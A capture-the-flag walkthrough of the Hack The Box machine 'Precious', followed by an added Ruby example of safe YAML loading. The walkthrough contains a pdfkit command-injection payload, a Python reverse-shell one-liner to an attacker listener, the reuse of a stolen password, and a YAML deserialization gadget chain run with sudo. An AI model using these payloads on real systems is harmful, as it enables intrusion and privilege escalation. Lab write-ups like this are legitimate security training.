HTB Machine Precious

Last updated 1 year ago

Port scanning with nmap

  • port 80 is open: it redirects to http://precious.htb/

Add precious.htb to /etc/hosts.

The page offers a "Convert Web Page to PDF" function.

After submitting a URL, a PDF file is downloaded.

Running exiftool on the PDF shows that it was generated by pdfkit v0.8.6.

This version is vulnerable to RCE: a command placed inside backticks in the URL is executed on the server.

Payload:

http://%20`{command}`

We can use this to get a reverse shell (10.10.14.40:4444 is the attacker's listener):

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

Reference: https://www.revshells.com/

This gives a shell as user ruby.

There are two users in the /home directory.

The user flag is in henry's home directory, but ruby cannot read it.

Inside ruby's home directory there is a config file under .bundle, and this file contains henry's password.

We can use this password to ssh in as henry.

henry can run /opt/update_dependencies.rb as root with sudo.

The script itself is not writable, but looking at the code we see it calls YAML.load, which is vulnerable to a deserialization attack because tagged YAML documents can instantiate arbitrary Ruby objects.

The script reads dependencies.yml, and that file we can write.

Payload:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

Reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

Now run the script with sudo: sudo /usr/bin/ruby /opt/update_dependencies.rb

This prints the root flag.
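As an added example, not part of the original writeup or of the machine's script: the fix for this class of bug is to parse dependencies.yml with YAML.safe_load, which refuses the !ruby/object tags the payload above depends on, and then to check the shape of the data before using it. It assumes Ruby 2.6+ (Psych 3.1 or later) and that the script expects a plain list of name/version entries; both sample documents are constructed.

```ruby
require 'yaml'

# Constructed sample: the kind of list update_dependencies.rb would
# legitimately read (the real file format is an assumption here).
BENIGN_YAML = <<~YAML
  ---
  - name: rails
    version: "7.0.4"
  - name: pdfkit
    version: "0.8.6"
YAML

# Constructed sample: a document carrying a Ruby object tag, the same
# shape as the deserialization payload above (no gadget chain here).
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# Hardened loader: only core YAML types (String, Integer, Float, Array,
# Hash, ...). Any !ruby/object, !ruby/module or Symbol tag raises
# Psych::DisallowedClass instead of instantiating the class.
def load_dependencies(text)
  YAML.safe_load(text, permitted_classes: [], permitted_symbols: [], aliases: false)
end

# Second line of defence: validate the shape, so an unexpected document
# is rejected even when it parsed without any tags.
def valid_dependency_list?(data)
  return false unless data.is_a?(Array)
  data.all? do |entry|
    entry.is_a?(Hash) &&
      entry.keys.sort == %w[name version] &&
      entry['name'].is_a?(String) &&
      entry['version'].is_a?(String)
  end
end

# :ok when the document is both safe to load and well-formed, else :rejected.
def check_dependencies(text)
  data = load_dependencies(text)
  valid_dependency_list?(data) ? :ok : :rejected
rescue Psych::Exception
  :rejected
end

puts "benign: #{check_dependencies(BENIGN_YAML)}"   # benign: ok
puts "tagged: #{check_dependencies(TAGGED_YAML)}"   # tagged: rejected
```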

:octocat: Happy Hacking :octocat: